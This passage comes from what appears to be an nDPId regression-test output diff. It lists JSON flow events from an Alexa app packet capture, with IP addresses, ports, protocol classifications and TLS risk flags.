{"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1490976136930,"flow_last_seen":1490976140745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13686,"flow_avg_l4_payload_len":333,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976142629,"flow_last_seen":1490976148981,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3595,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00931{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976076042,"flow_last_seen":1490976177233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3494,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976196942,"flow_last_seen":1490976198168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11051,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976197297,"flow_last_seen":1490976198043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9036,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +01043{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976071392,"flow_last_seen":1490976176431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5656,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976195983,"flow_last_seen":1490976196942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13938,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":350,"flow_first_seen":1490976195984,"flow_last_seen":1490976198040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":248700,"flow_avg_l4_payload_len":710,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1490976195985,"flow_last_seen":1490976196943,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15782,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1490976195529,"flow_last_seen":1490976198776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":34748,"flow_avg_l4_payload_len":534,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1490976085644,"flow_last_seen":1490976098828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":21353,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976085829,"flow_last_seen":1490976088478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4344,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976085832,"flow_last_seen":1490976088478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2595,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976088605,"flow_last_seen":1490976094930,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":1938,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":49,"flow_first_seen":1490976088631,"flow_last_seen":1490976098828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":18884,"flow_avg_l4_payload_len":385,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":33,"flow_first_seen":1490976088937,"flow_last_seen":1490976110046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12258,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":42,"flow_first_seen":1490976088958,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12771,"flow_avg_l4_payload_len":304,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1490976089227,"flow_last_seen":1490976107676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8016,"flow_avg_l4_payload_len":296,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1490976089239,"flow_last_seen":1490976111839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10466,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976114885,"flow_last_seen":1490976117017,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4039,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976114894,"flow_last_seen":1490976116921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2723,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976114906,"flow_last_seen":1490976117017,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976114921,"flow_last_seen":1490976117016,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2611,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976114940,"flow_last_seen":1490976120960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5531,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976030894,"flow_last_seen":1490976194743,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13865,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976150029,"flow_last_seen":1490976164211,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":2962,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976158680,"flow_last_seen":1490976164214,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2813,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976169531,"flow_last_seen":1490976175920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2883,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 